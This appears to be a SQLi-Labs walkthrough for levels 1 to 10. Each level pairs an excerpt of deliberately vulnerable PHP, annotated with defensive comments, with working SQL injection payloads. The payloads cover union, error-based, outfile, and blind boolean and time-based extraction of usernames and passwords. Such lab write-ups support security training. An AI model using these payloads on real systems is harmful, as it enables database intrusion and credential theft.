SQLi-Labs Less 1-10
Less-1 GET - Error based - Single Quotes - String 报错注入
Code:
// Less-1 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Injection point: $id is interpolated into a single-quoted SQL string literal, so a
// quote in the input terminates the literal and the remainder is parsed as SQL.
// The standard fix is a prepared statement with id bound as a parameter.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Echoes the matched row's credentials, including the stored password, to the client.
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
// Sends the raw MySQL error text to the client. This error echo is what makes the
// level "error based": every malformed query discloses parser detail to the caller.
print_r(mysql_error());
Code:
' or 1=1 --+
' and 1=2 union select 1,user(),database() --+
' and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
' and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
' and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-2 GET - Error based - Integer based
Code:
// Less-2 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or cast.
$id=$_GET['id'];
// Injection point: $id is interpolated unquoted (numeric context), so anything after
// the leading number is parsed directly as SQL — no quote is needed to break out.
// Casting to int or binding the value as a parameter would close this.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Echoes the matched row's credentials, including the stored password, to the client.
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
// Raw MySQL error text is returned to the client (error-based level).
print_r(mysql_error());
Code:
1 or 1=1 --+
1 and 1=2 union select 1,user(),database() --+
1 and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
1 and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
1 and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-3 GET - Error based - Single Quotes with twist - String
Code:
// Less-3 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Injection point: $id sits inside a single-quoted literal that is itself wrapped in
// parentheses ("the twist"); the vulnerability is the same string interpolation as
// Less-1, only the surrounding syntax differs. Parameter binding would fix it.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Echoes the matched row's credentials, including the stored password, to the client.
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
// Raw MySQL error text is returned to the client (error-based level).
print_r(mysql_error());
Code:
') or 1=1 --+
') and 1=2 union select 1,user(),database() --+
') and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
') and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
') and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
') and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-4 GET - Error based - Double Quotes - String
Code:
// Less-4 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Wraps the raw value in double quotes before interpolation. This is not escaping:
// a double quote inside the input still closes the literal.
$id = '"' . $id . '"';
// Injection point: the double-quoted, parenthesised value is spliced into the SQL
// text; note the leading space inside the string is part of the query as sent.
$sql=" SELECT * FROM users WHERE id=($id) LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Echoes the matched row's credentials, including the stored password, to the client.
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
}
else
{
// Raw MySQL error text is returned to the client (error-based level).
print_r(mysql_error());
Code:
") or 1=1 --+
") and 1=2 union select 1,user(),database() --+
") and 1=2 union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 LIMIT 3,1 --+
") and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 1,1 --+
") and 1=2 union select 1,2,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 LIMIT 2,1 --+
") and 1=2 union select 1,username,password from security.users LIMIT 0,1 --+
Less-5 GET - Double injection - Single Quotes - String 利用报错回显
双注入语句:union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入语句))a from information_schema.tables group by a)b
Code:
// Less-5 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Injection point: same single-quoted interpolation as Less-1 (leading space in the
// string is part of the query as sent).
$sql=" SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Unlike Less-1..4, no row data is echoed on success — only a fixed string. The only
// channel that still carries query results back to the client is the error text below.
echo 'You are in...........';
}
else
{
// Raw MySQL error text is returned to the client; suppressing it (and logging it
// server-side instead) would remove the output channel this level relies on.
print_r(mysql_error());
Code:
' or 1=1 --+
' union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+
Less-6 GET - Double injection - Double Quotes - String
Code:
// Less-6 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Wraps the raw value in double quotes before interpolation; not an escaping step.
$id = '"'.$id.'"';
// Injection point: the double-quoted value is spliced directly into the SQL text
// (no parentheses this time, unlike Less-4).
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Fixed string on success; no row data is echoed.
echo 'You are in...........';
}
else
{
// Raw MySQL error text is returned to the client — the only channel for query results here.
print_r(mysql_error());
Code:
" or 1=1 --+
" union select 1 from (select count(*),concat(floor(rand()*2),(select concat(version(),0x22, user(),0x22,database())))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1))a from information_schema.tables group by a)b --+
" union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username,0x22,password) from security.users limit 0,1))a from information_schema.tables group by a)b --+
Less-7 GET - Dump into outfile - String 利用文件转储 into outfile
Code:
// Less-7 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Injection point: single-quoted literal wrapped in two sets of parentheses; still
// plain string interpolation, so parameter binding is the fix.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Fixed string on success; no row data is echoed.
echo 'You are in.... Use outfile......';
}
else
{
// A constant message replaces the MySQL error text, so unlike Less-1..6 no query
// detail reaches the client through the response body. (The level's title says the
// remaining write path is MySQL's file output; restricting FILE privilege and
// secure_file_priv on the DB account is the server-side control for that.)
echo 'You have an error in your SQL syntax';
//print_r(mysql_error());
Code:
')) or 1=1 --+
')) and 1=2 union select 1,2,TABLE_NAME into outfile '/var/www/tables.txt' from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 --+
')) and 1=2 union select 1,2,COLUMN_NAME into outfile '/var/www/column.txt' from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 --+
')) and 1=2 union select 1,username,password into outfile+'/var/www/data.txt' from security.users --+
Less-8 GET - Blind - Boolean Based - Single Quotes
Code:
// Less-8 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Injection point: same single-quoted interpolation as Less-1.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
// Fixed string on success.
echo 'You are in...........';
}
else
{
// Every output in the failure branch is commented out, so the response differs only
// by the presence or absence of the success string — a one-bit (boolean) oracle.
// Returning an identical response in both branches would close that oracle.
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
Code:
1' or 1=1 --+
1' and ascii(substr(database(),1,1))=115 --+
1' and (ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 --+
1' and (ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 --+
1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 --+
1' and (ascii(substr((select password from users limit 0,1),1,1))) = 68 --+
Less-9 GET - Blind - Time Based - Single Quotes
Code:
// Less-9 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Injection point: same single-quoted interpolation as Less-1.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
echo 'You are in...........';
}
else
{
// Both branches print the same string, so the response body carries no signal at
// all; only response timing remains as a side channel. Statement timeouts and
// rate limiting reduce that channel, but the real fix is still parameter binding.
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
Code:
1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1' and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1' and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1' and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
Less-10 GET - Blind - Time Based - Double Quotes
Code:
// Less-10 excerpt as printed on the page: the query-execution call that populates
// $row and the closing braces are not shown here.
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string, with no validation or escaping.
$id=$_GET['id'];
// Wraps the raw value in double quotes before interpolation; not an escaping step.
$id = '"'.$id.'"';
// Injection point: the double-quoted value is spliced directly into the SQL text.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// $row is presumably the row fetched for $sql — that call is outside this excerpt.
if($row)
{
echo 'You are in...........';
}
else
{
// Identical output in both branches (as in Less-9): no content-based signal, only
// timing. Parameter binding removes the injection; statement timeouts limit the channel.
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
Code:
1" and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
1" and if((ascii(substr((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x7365637572697479 limit 3,4),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 1,1 ),1,1))) = 117 ,sleep(5),1) --+
1" and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x7365637572697479 and TABLE_NAME=0x7573657273 limit 2,1 ),1,1))) = 112 ,sleep(5),1) --+
1" and if((ascii(substr((select username from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+
1" and if((ascii(substr((select password from users limit 0,1),1,1))) = 68 ,sleep(5),1) --+